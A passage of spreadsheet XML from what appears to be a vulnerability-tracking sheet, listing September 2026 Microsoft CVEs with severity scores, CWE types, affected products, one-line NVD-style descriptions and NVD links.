      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D1001" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1001" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K100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01" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1001" s="5" t="inlineStr"/>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1001" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D1002" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1002" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1002" s="5" t="inlineStr"/>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1002" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D1003" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1003" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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03" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1003" s="5" t="inlineStr"/>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1003" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="D1004" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1004" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1004" s="5" t="inlineStr"/>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S1004" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="D1005" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1005" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1005" s="5" t="inlineStr"/>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S1005" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="D1006" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1006" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1006" s="5" t="inlineStr"/>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1006" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="D1007" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1007" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1007" s="5" t="inlineStr"/>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1007" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="D1008" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1008" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1008" s="5" t="inlineStr"/>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S1008" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="D1009" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1009" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K100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009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1009" s="5" t="inlineStr"/>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1009" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="D1010" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1010" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1010" s="5" t="inlineStr"/>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1010" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="D1011" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1011" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1011" s="5" t="inlineStr"/>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S1011" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D1012" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1012" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1012" s="5" t="inlineStr"/>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1012" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D1013" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1013" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K1013" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1013" s="5" t="inlineStr"/>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1013" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D1014" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1014" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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14" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1014" s="5" t="inlineStr"/>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S1014" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77897</t>
        </is>
      </c>
      <c r="D1015" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1015" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1015" s="5" t="inlineStr"/>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S1015" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D1016" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1016" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1016" s="5" t="inlineStr"/>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1016" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D1017" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1017" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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17" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1017" s="5" t="inlineStr"/>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1017" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D1018" s="5" t="n">
        <v>7</v>
      </c>
